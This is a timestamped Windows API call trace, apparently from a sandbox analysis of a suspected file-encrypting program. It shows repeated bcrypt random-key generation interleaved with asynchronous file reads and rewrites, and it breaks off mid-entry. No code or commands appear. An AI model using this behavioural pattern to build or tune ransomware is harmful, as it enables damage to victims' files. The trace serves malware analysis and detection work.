free (_Block=0x1ff1a40) [0084.217] free (_Block=0x77d908) [0084.217] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0084.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.244] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.244] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0084.244] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0084.245] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0084.245] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0084.245] free (_Block=0x77d800) [0084.245] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0084.245] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0084.246] free (_Block=0x1ff1930) [0084.246] free (_Block=0x1ff1a40) [0084.246] free (_Block=0x77d908) [0084.246] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0084.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0084.267] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0084.267] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0084.267] free (_Block=0x77d800) [0084.267] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0084.267] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0084.267] free (_Block=0x1ff1930) [0084.267] free (_Block=0x1ff1a40) [0084.267] free (_Block=0x77d908) [0084.267] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0084.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.072] ReadFile (in: hFile=0x3b8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0085.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.127] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x1274, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0085.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.283] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x59c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.299] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.315] CloseHandle (hObject=0x3c0) returned 1 [0085.315] free (_Block=0x1ff1e60) [0085.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.329] ReadFile (in: hFile=0x3ac, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 0x0 [0085.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.357] ReadFile (in: hFile=0x3b4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.361] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.362] CloseHandle (hObject=0x3b4) returned 1 [0085.368] free (_Block=0x2031ed0) [0085.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.368] WriteFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.494] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0085.494] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.512] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.518] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.518] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.518] free (_Block=0x77d800) [0085.518] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0085.518] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0085.518] free (_Block=0x3db00b8) [0085.518] free (_Block=0x3db01c8) [0085.518] free (_Block=0x77d908) [0085.518] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.621] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.622] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.622] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.622] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.627] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.627] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.627] free (_Block=0x77d800) [0085.627] calloc (_Count=0x41, _Size=0x4) returned 0x3d70048 [0085.627] calloc (_Count=0x82, _Size=0x4) returned 0x3d70158 [0085.627] free (_Block=0x3d70048) [0085.627] free (_Block=0x3d70158) [0085.627] free (_Block=0x77d908) [0085.627] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0085.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.643] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.643] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.643] free (_Block=0x77d800) [0085.643] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.643] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.644] free (_Block=0x1ff1930) [0085.644] free (_Block=0x1ff1a40) [0085.644] free (_Block=0x77d908) [0085.644] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0085.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.649] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.649] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.649] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.650] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.650] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.650] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.650] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.650] free (_Block=0x77d800) [0085.650] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.650] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.651] free (_Block=0x1ff1930) [0085.651] free (_Block=0x1ff1a40) [0085.651] free (_Block=0x77d908) [0085.651] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.664] CloseHandle (hObject=0x3ac) returned 1 [0085.664] free (_Block=0x1ff1e60) [0085.664] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.679] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.680] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.680] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.680] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.680] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.681] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.681] free (_Block=0x77d800) [0085.681] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.681] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.681] free (_Block=0x1ff1930) [0085.681] free (_Block=0x1ff1a40) [0085.681] free (_Block=0x77d908) [0085.681] WriteFile (in: hFile=0x3c4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.732] CloseHandle (hObject=0x3c4) returned 1 [0085.733] free (_Block=0x2031ed0) [0085.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.736] WriteFile (in: hFile=0x3bc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1930, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0085.736] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.738] CloseHandle (hObject=0x3ac) returned 1 [0085.740] free (_Block=0x1ff1e60) [0085.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.745] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.764] ReadFile (in: hFile=0x3b8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.775] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.775] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.776] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.776] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0085.776] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0085.776] free (_Block=0x1ff1e60) [0085.776] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0085.776] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0085.777] free (_Block=0x1ff1e60) [0085.777] free (_Block=0x1ff1930) [0085.777] free (_Block=0x77d800) [0085.777] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.777] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.778] WriteFile (in: hFile=0x3c0, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.885] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0085.885] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.893] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.905] CloseHandle (hObject=0x3b8) returned 1 [0085.906] free (_Block=0x1fb18c0) [0085.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.926] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x2fcdc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0085.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.958] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.958] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.959] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.959] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.959] free (_Block=0x77d800) [0085.959] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0085.959] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0085.960] free (_Block=0x1ff1930) [0085.960] free (_Block=0x1ff1a40) [0085.960] free (_Block=0x77d908) [0085.960] WriteFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0085.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0085.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0085.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0085.978] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0085.978] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0085.978] free (_Block=0x77d800) [0085.978] calloc (_Count=0x41, 